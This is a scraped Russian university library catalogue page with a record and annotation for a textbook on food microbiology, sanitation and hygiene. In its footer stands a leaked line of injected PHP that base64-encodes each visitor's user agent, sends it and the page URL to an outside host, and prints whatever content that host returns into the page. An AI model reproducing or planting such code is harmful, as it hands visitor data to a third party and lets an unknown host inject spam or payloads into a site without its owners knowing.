Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

102 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=BC4E089B-AAC5-EB56-F40C-3AFE33F0EAAC$")И(("Ключевые слова=Пряность"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
BC4E089B-AAC5-EB56-F40C-3AFE33F0EAAC
(Нет сведений об экземплярах)
BC4E089B-AAC5-EB56-F40C-3AFE33F0EAAC
57/М89
М 89
Мудрецова-Висс, Клавдия Алексеевна.
Микробиология, санитария и гигиена [Текст] : учебник гриф-МО / К. А. Мудрецова-Висс, В. П. Дедюхина. - 4-е изд., испр. и доп. - М. : Форум : ИНФРА - М, 2010. - 400 с. - (Высшее образование). - Библиогр.: с. 394-395. - ISBN 978-5-8199-0350-6. - ISBN 978-5-16-003263-4 : 730.00 р.
УДК 579(075) + 614(075)
ББК 28.4

Рубрики:
Микробиология
Санитария -- УЧЕБНИКИ И ПОСОБИЯ
Гигиена -- УЧЕБНИКИ И ПОСОБИЯ

Кл.слова (ненормированные): МИКРООРГАНИЗМЫ -- МИКРООРГАНИЗМ -- МИКРОФЛОРА -- ПОЧВА -- ВОДА -- ВОЗДУХ -- ТАРА -- ЧЕЛОВЕК -- ПРОДУКТЫ -- ПРЯНОСТЬ -- СОЛЬ
Аннотация: Учебник состоит из трех взаимосвязанных частей: основы общей микробиологии (гл. 1-3); микробиология, санитария пищевых продуктов (гл.4-7) и основы гигиены и санитарии в торговле (гл. 8).
Приведены современные данные о морфологии и физиологии микроорганизмов, биохимических процессах, вызываемых ими, а также рассмотрено влияние экологических факторов на микрофлору, развивающуюся в продуктах питания при транспортировании, хранении, реализации и переработке сырья. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно-патогенными видами. Применительно к профилю специальности изложены микробиологические процессы, приводящие к понижению качества и потерям ценности пищевых продуктов. Рекомендованы пути, способы и мероприятия, позволяющие предотвратить эти процессы или значительно уменьшить их. Рассмотрены основные санитарно-эпидемиологические требования к предприятиям торговли и обороту в них продовольственного сырья и пищевых продуктов.
Предназначен для студентов высших учебных заведений, аспирантов, преподавателей и практических работников.
Доп. точки доступа:
Дедюхина, Валентина Петровна

Нет сведений об экземплярах
Держатели документа:
Библиотека омского института филиала РГТЭУ : Россия, 644009, г. Омск, ул. 10 лет Октября, д.195, кор.18
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11

Учебник состоит из трех взаимосвязанных частей: основы общей микробиологии (гл. 1-3); микробиология, санитария пищевых продуктов (гл.4-7) и основы гигиены и санитарии в торговле (гл. 8).

Приведены современные данные о морфологии и физиологии микроорганизмов, биохимических процессах, вызываемых ими, а также рассмотрено влияние экологических факторов на микрофлору, развивающуюся в продуктах питания при транспортировании, хранении, реализации и переработке сырья. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно-патогенными видами. Применительно к профилю специальности изложены микробиологические процессы, приводящие к понижению качества и потерям ценности пищевых продуктов. Рекомендованы пути, способы и мероприятия, позволяющие предотвратить эти процессы или значительно уменьшить их. Рассмотрены основные санитарно-эпидемиологические требования к предприятиям торговли и обороту в них продовольственного сырья и пищевых продуктов.

Предназначен для студентов высших учебных заведений, аспирантов, преподавателей и практических работников.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.14 запросов, 0.75c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;